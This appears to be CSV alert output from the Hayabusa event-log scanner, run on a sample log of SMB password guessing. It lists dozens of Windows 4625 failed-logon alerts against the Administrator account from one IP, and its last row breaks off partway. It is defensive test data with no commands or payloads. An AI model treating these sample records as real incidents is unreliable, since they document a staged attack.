2016-09-20 01:51:42.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cxCC83XLMIJrNMvl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.785 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MzussOcg5ihdrnD0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 55l4HKICu8x0FpQv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.891 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5GmlVWDjZ75tT08G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o6v1DkuFvB04PESQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:42.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VTLdNb0XbzXuLi51 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CSjDYb1BhHC9UTxO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.054 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V1yLH19VsfLx9BGF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X4AVhjdz9yHsfss0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.133 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bqWLOKaKwS8VBxDj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.181 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EjK8A8DTSYursBzj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:43.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UaDCKPslwRaLBWtH | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.274 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xAvoekviFDSAIgBe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.310 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3XOmFwh8IamESWCM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 54GbW769j1x27mrI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.394 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bZSkhwZXc1SSknDT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.435 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 05AuqlN44x7oJGoi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.482 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RQ4A6ReTVTcFCFeN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T7U6i4CMrL0bHouf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NaeA4uZ6o8BRbzwf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.626 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MEnlL5BHmlCrtk7p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KRNMpwAAaTsyzPfR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.709 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oBtHQkRWIoq5hfn7 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5pkk9lgqMQ4wxQel | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yQVan7kRDOlnim50 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9282GqsC7UiUMbRl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3lj7GjYryW9wjGgS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:43.990 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MPy4iUy5WBSLUBdy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.041 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0kvD9DEuos8SRrLH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NH1EnMG6fTvcz4QR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.131 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cqHDXSQn8gkl2LJy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RWI9XDDHjs2xcNB7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zo53mEz6nal5Gxff | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jtOgC6wqMoNYVxId | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DdadoJYvD7DYjlSG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U1xjdqjT9h0KUqG2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QfkzZBvO4onYx6JZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JqY8CvyODDLQV9Ps | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nPMRIxRVuh13jmZD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.523 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jARkTWdKTfTIwlug | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.567 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zwhkc71Nfn7QDf7c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qsYad9PgEajlYqvo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9YPw0DsspVbrOld | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wsHpLCOdAOPFM6nD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OcNytOhGOZKaREL9 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lc5boBVigHE1ccGA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.819 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BQXg4ZHdBYHyiTTO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JebTJzyn91NrpvkD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8wCE5ypjEU5feEEv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OglsROoqX48xm0gJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:44.956 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5bNC9ES3l3KwXPxb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: byPavQuiscMm7CMW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UQESAC3XpxCJJfG5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5aYRnzirSj0PNXAE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8s9xJ659geFHOlY4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.154 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yBQdyO0diiFixwlx | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vzULtccOFnLIRiVM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1pDEGzqTAyUab5P8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.274 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gomgb26W9qFacRr7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.318 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GXOcDu88S5c5VwwV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WHRnzgQkfAhsUguj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.401 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A0Q9ZIaRK43W9apv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2xvriGeIlDwtzS36 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.498 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pDYTFqeJC61Nneef | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0LNR7xCHW9x2q2qc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.578 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AE4EBj8X5IfXO8ZZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BEOSGw6TjZf9GWS | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.679 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UCxe24uL4A6R9kgZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.830 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8v4DcIRkx43KCIs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CY2buVupQ5oR1Cp5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f6c3MlpMEzkCVud2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:45.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E2wV6op9AU4paDXp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.051 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BNn6aywSs67hVAO2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wUa03SIX69WCIYbp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:46.158 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zYi4TB42B2VQm5Tr | IP Addr: 192.168.198.149 | AuthPackage: 